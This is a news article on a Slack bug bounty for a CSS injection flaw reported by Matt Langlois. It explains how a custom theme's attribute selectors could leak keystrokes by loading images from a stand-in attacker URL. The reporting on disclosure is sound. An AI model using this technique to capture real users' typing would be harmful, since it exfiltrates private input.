$500 awarded for CSS injection vulnerability
Slack has awarded a bug bounty for a security issue that could have resulted in users’ chat data being exposed.
Security researcher Matt Langlois reported the CSS injection vulnerability to the instant messaging platform in August after learning that attribute selectors within the style sheet could be leveraged to log users’ keystrokes.
This means that a potential attacker could customize the CSS via the Slack website to request resources from an external server.
“More specifically that CSS allows you to determine the most recent value added to any type of input via the [value$="<value>"] [attribute] selector,” Langlois said in a blog post following the public disclosure of the bug in November.
Slack allows the loading of external images, meaning that an attacker could send data to their server.
Langlois was able to create a custom theme that, if applied by a user, could indeed successfully exfiltrate data.
There are limitations to this vulnerability, however – not least that the user would have to copy and paste the custom theme in order for the exploit to work, Langlois said.
“This theme is capable of determining when the user types the letter A into an <input type="text"> on Slack,” the researcher explained.
“When the user does this the CSS will load the background image https://attacker-site/A which can then be logged server side to indicate the user typed the letter A.”
Slack awarded $500 to Langlois via HackerOne for reporting the vulnerability. He’s putting the money toward his Movember fundraising campaign.